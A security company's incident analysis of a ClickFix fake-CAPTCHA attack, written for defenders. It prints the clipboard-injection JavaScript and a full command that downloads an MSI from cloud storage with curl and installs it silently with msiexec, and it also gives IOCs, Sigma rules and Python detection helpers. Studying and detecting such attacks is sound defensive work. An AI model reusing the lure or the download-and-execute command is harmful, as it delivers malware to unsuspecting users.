Triskele Labs Blog

Fake CAPTCHA to Full Execution: Dissecting a ClickFix LOTL Attack

Written by Philip O'Dwyer | Apr 15, 2026 5:10:54 AM

Prepared by: Philip O'Dwyer & Muhammad Uzair | Last update: 15 April 2026

A user-driven execution technique bypasses traditional controls using trusted Windows binaries

A companion article covers the business impact and security implications for organisational leaders: https://www.triskelelabs.com/blog/copy-paste-cyber-attack-clickfix-soc-detection

A recent incident investigated by Triskele Labs highlights a growing shift in adversary tradecraft, where user-driven execution replaces traditional exploitation techniques.

In this case, a ClickFix-style Fake CAPTCHA lure was used to socially engineer a user into executing a malicious command. Rather than deploying a conventional malware dropper, the attacker relied entirely on legitimate Windows binaries and trusted infrastructure, forming a living-off-the-land (LOTL) attack chain. From initial interaction to payload execution, the entire sequence completed in under 10 seconds.

Fake CAPTCHA pages abuse clipboard to trigger execution

Browser history analysis confirmed the user was actively searching for defibrillators, during which they visited:

defibrillators[.]com[.]au

Upon visiting the site, the user was presented with a ClickFix-style Fake CAPTCHA prompt, initiating the attack chain.

This indicates the site was either:

  • Compromised (likely) and serving malicious JavaScript 

  • Or part of a malvertising / traffic redirection chain 

Following interaction with the CAPTCHA, the page executed clipboard injection logic:

navigator.clipboard.writeText(
  'cmd /c "curl -L https://<redacted>/payload.msi -o %TEMP%\\n.msi && msiexec /i %TEMP%\\n.msi /qn /norestart"'
);

After clicking the CAPTCHA, the user was shown instructions to:

  • Press Win + R 

  • Paste the clipboard contents (Ctrl + V) 

  • Press Enter 

This removes any need for the user to read or understand the command, which makes execution highly likely.

Initial Access Vector: User Intent Abuse

This incident demonstrates a shift toward intent-based initial access, where adversaries exploit legitimate user activity rather than relying on phishing or vulnerability exploitation.

In this case:

  • The user performed a legitimate search (defibrillators) 

  • A relevant website was visited 

  • The site delivered a malicious interaction via Fake CAPTCHA 

This removes traditional indicators such as:

  • Suspicious emails 

  • Malicious attachments 

  • Known exploit activity 

Instead, the attack leverages trust in context and user intent as the delivery mechanism.

Figure 1: ClickFix page impersonating a CAPTCHA prompt, using the clipboard API to pre-load a malicious command

Figure 2: Fake verification error prompting the user to execute a pre-loaded command via the Windows Run dialog

Figure 3: Clipboard Injection Materialised: Command Executed via Run


Malicious command leverages built-in Windows tools

Once executed, the command initiated a chained sequence of legitimate tools:

cmd /c "curl -L https://storage.googleapis.com/nodedownload/Node_Min.msi -o %TEMP%\n.msi && msiexec /i %TEMP%\n.msi /qn /norestart"

Figure 4: Run Dialog Execution Artefact with Embedded Payload Delivery Command

Breakdown of the attack command

  Component            Purpose
  cmd /c               Executes command and terminates
  curl -L              Downloads payload, following redirects
  Cloud Storage URL    Trusted infrastructure used to host payload
  -o %TEMP%\n.msi      Writes payload to temp directory
  &&                   Chains execution
  msiexec /i           Executes MSI installer
  /qn                  Silent execution
  /norestart           Suppresses reboot

The use of Google Cloud Storage reduces suspicion and bypasses reputation-based controls.

Process chain confirms living-off-the-land execution

Endpoint telemetry revealed a clear parent-child execution chain:

explorer.exe
  └── cmd.exe
        └── curl.exe
              └── msiexec.exe

This sequence demonstrates classic LOLBAS abuse:

  • curl.exe used for payload delivery (T1105)

  • msiexec.exe used for execution (T1218.007) 

Figure 5: User Click to Code Execution: Visualising the Attack Chain


Registry artefacts confirm user-driven execution

Analysis identified the following registry artefact:

HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
Containing:
cmd /c "curl -L https://storage.googleapis.com/.../Node_Min.msi ..."

This confirms execution via the Windows Run dialog, aligning with the Fake CAPTCHA instructions.
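An added triage helper, not part of the original write-up: it orders a RunMRU export the way the MRUList value orders it (most recent first; each entry is a single-letter value terminated by "\1", which is the key's format rather than anything specific to this case) and flags entries matching the download-then-silent-msiexec shape seen here. The RUNMRU dictionary is constructed sample data, not an export from the incident host.

```python
import re

# Constructed RunMRU export (not from the incident host). RunMRU keeps each Run
# dialog entry in a single-letter value terminated by "\1", and MRUList lists
# those letters most-recent first; that is the key's format, not specific to this case.
RUNMRU = {
    "MRUList": "cab",
    "a": "notepad\\1",
    "b": "\\\\fileserver\\share\\1",
    "c": 'cmd /c "curl -L https://storage.googleapis.com/nodedownload/Node_Min.msi '
         '-o %TEMP%\\n.msi && msiexec /i %TEMP%\\n.msi /qn /norestart"\\1',
}

# Command shape from this incident: CLI download chained (&&) into a silent msiexec install.
SUSPICIOUS = re.compile(r"curl\b.*https?://.*&&.*msiexec\s+/i\b.*\s/qn\b", re.IGNORECASE)

def run_history(values):
    """Return Run-dialog commands in MRU order (most recent first), terminator stripped."""
    history = []
    for letter in values.get("MRUList", ""):
        raw = values.get(letter)
        if raw is None:  # MRUList can reference a value that has since been deleted
            continue
        history.append(raw[:-2] if raw.endswith("\\1") else raw)
    return history

def suspicious_run_entries(values):
    """Return (mru_position, command) for entries matching the download-then-msiexec shape."""
    return [(i, cmd) for i, cmd in enumerate(run_history(values)) if SUSPICIOUS.search(cmd)]
```

Position 0 is the most recent Run entry, which is where a ClickFix paste lands when the host is examined shortly after the event.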

Attack completes in seconds, detection takes minutes

  Time        Event
  T+0s        User interacts with page
  T+5s        Command executed
  T+8s        Payload downloaded
  T+9s        MSI execution begins
  T+~5 min    Detection triggered
  T+44 min    Host contained

The execution chain completes in <10 seconds, requiring detection and response to operate in near real time.

Behavioural detection identifies malicious execution pattern

The activity was detected via:

MaliciousCopyPaste (MITRE T1204.004)

Detection triggered based on:

  • Suspicious process chain 

  • Command-line payload retrieval 

  • Silent MSI execution 

  • Execution originating from explorer.exe 

Detection was not based on:

  • File hashes 

  • Known malware signatures 

  • Static indicators 


Node.js installer used as payload staging mechanism

The payload was delivered as:

Node_Min.msi

This technique is commonly used to:

  • Deploy Node.js runtime environments
  • Execute JavaScript-based payloads
  • Stage follow-on malware

Observed in campaigns involving:

  • Lumma Stealer
  • AsyncRAT
  • Node-based loaders


Trusted tools, malicious intent

Every component used in this attack is legitimate:

  • explorer.exe
  • cmd.exe
  • curl.exe
  • msiexec.exe

Individually benign, collectively malicious:

explorer.exe → cmd.exe → curl.exe → msiexec.exe

Malicious intent is defined by execution sequence, not tooling


Why traditional security controls struggle

This attack bypasses traditional controls because:

  • No exploit is used

  • No malicious binary is initially dropped

  • Payload is hosted on trusted infrastructure

  • Execution uses signed binaries 

Detection based on signatures, reputation, or static analysis is therefore ineffective.


Indicators of Activity (IOAs) and Compromise (IOCs)

IOAs (Behavioural Indicators)

  • explorer.exe → cmd.exe → curl.exe → msiexec.exe

  • MSI execution from %TEMP%

  • Silent install flags (/qn /norestart)

  • Command-line driven payload retrieval

  • RunMRU registry artefact

Indicators of Compromise (IOCs)

Malicious / Suspicious Domains

defibrillators[.]com[.]au
sasndfsdfghjasd[.]run

Malicious IP address

188[.]114[.]97[.]3

Payload Hosting

storage.googleapis.com (abused for payload delivery)

Filename

Node_Min.msi

Command Pattern

cmd /c curl -L <url> -o %TEMP%\*.msi && msiexec /i %TEMP%\*.msi /qn


Detection strategy and engineering

High-confidence detection patterns

  • cmd → curl → msiexec chain

  • MSI execution from %TEMP%

  • Silent install flags

  • External CLI-based downloads

Sigma detection concepts

title: Suspicious Curl to MSI Execution Chain
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    ParentImage|endswith: '\cmd.exe'
    Image|endswith: '\curl.exe'
  condition: selection

---

title: Silent MSI Execution from Temp
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith: '\msiexec.exe'
    # both strings must be present; a plain list under |contains would match either one
    # note: cmd.exe expands %TEMP% before msiexec.exe starts, so the expanded
    # Temp path should also be matched in production telemetry
    CommandLine|contains|all:
      - '/qn'
      - '%TEMP%'
  condition: selection
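To show the detection patterns and Sigma concepts above as executable logic, here is an added example that is not from the original post: it walks constructed process-creation events, rebuilds the msiexec.exe lineage from pid/ppid links, and flags a silent MSI install from the Temp directory under explorer.exe → cmd.exe with a curl.exe download in the same lineage. The EVENTS list, its pids and its file paths are sample data.

```python
import re

# Constructed sample process-creation events (not real telemetry): pid, ppid,
# image path, command line. Under cmd /c "a && b", curl.exe and msiexec.exe are
# both started as children of the same cmd.exe.
EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\cmd.exe",
     "cmd": r'cmd /c "curl -L https://storage.googleapis.com/nodedownload/Node_Min.msi -o %TEMP%\n.msi && msiexec /i %TEMP%\n.msi /qn /norestart"'},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\curl.exe",
     "cmd": r"curl -L https://storage.googleapis.com/nodedownload/Node_Min.msi -o C:\Users\u\AppData\Local\Temp\n.msi"},
    {"pid": 400, "ppid": 200, "image": r"C:\Windows\System32\msiexec.exe",
     "cmd": r"msiexec /i C:\Users\u\AppData\Local\Temp\n.msi /qn /norestart"},
    # Benign silent install by a vendor updater (its parent is not in the sample): same flags, other path
    {"pid": 600, "ppid": 500, "image": r"C:\Windows\System32\msiexec.exe",
     "cmd": r"msiexec /i C:\ProgramData\Vendor\update.msi /qn /norestart"},
]

TEMP_RE = re.compile(r"%TEMP%|\\AppData\\Local\\Temp\\", re.IGNORECASE)  # unexpanded or expanded Temp
URL_RE = re.compile(r"https?://", re.IGNORECASE)

def basename(image):
    return image.rsplit("\\", 1)[-1].lower()

def ancestors(events, pid):
    """Yield ancestor events of pid, nearest parent first, by following ppid links."""
    by_pid = {e["pid"]: e for e in events}
    seen = set()
    while pid in by_pid and pid not in seen and by_pid[pid]["ppid"] in by_pid:
        seen.add(pid)
        pid = by_pid[pid]["ppid"]
        yield by_pid[pid]

def find_clickfix_chains(events):
    """Return pids of msiexec.exe processes matching this incident's pattern: silent (/qn)
    install from Temp under explorer.exe -> cmd.exe, with a curl.exe download in the lineage."""
    hits = []
    for e in events:
        if basename(e["image"]) != "msiexec.exe":
            continue
        if "/qn" not in e["cmd"].lower() or not TEMP_RE.search(e["cmd"]):
            continue
        lineage = list(ancestors(events, e["pid"]))
        if not {"cmd.exe", "explorer.exe"} <= {basename(a["image"]) for a in lineage}:
            continue
        lineage_pids = {a["pid"] for a in lineage}
        if any(basename(c["image"]) == "curl.exe" and URL_RE.search(c["cmd"])
               and (c["pid"] in lineage_pids or c["ppid"] in lineage_pids) for c in events):
            hits.append(e["pid"])
    return hits
```

The vendor updater's msiexec.exe carries the same /qn flag but is neither under explorer.exe → cmd.exe nor installing from Temp, so requiring the whole sequence rather than any single attribute keeps the rule high-confidence.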


MDR response prevents compromise

  • MTTD: 5 minutes

  • MTTR: 44 minutes

Following detection:

  • Execution chain analysed

  • Malicious intent confirmed

  • Host actively contained


Containment: the control that mattered

Host isolation:

  • Stopped further execution

  • Blocked outbound communication

  • Prevented persistence

  • Eliminated lateral movement

Attack stopped mid-execution, pre-impact


Detection vs response

  • Detection identifies activity

  • MDR enforces control

Without containment:

  • Payload execution completes

  • Runtime deployed

  • Secondary malware executes


A shift toward user-driven attack vectors

ClickFix campaigns demonstrate:

  • Exploitation of user behaviour

  • Use of legitimate tooling

  • Execution-based attack chains

Detection must shift from:

“Is this file malicious?”

to:

“Does this behaviour make sense?”


Final thoughts

This attack reached execution despite existing controls, reflecting the effectiveness of user-driven, LOTL-based techniques. However, it did not progress to compromise.

  • Preventative controls disrupted execution

  • Behavioural detection identified the activity

  • Response actions ensured containment

The attack was stopped before impact through a combination of layered controls and MDR-led response.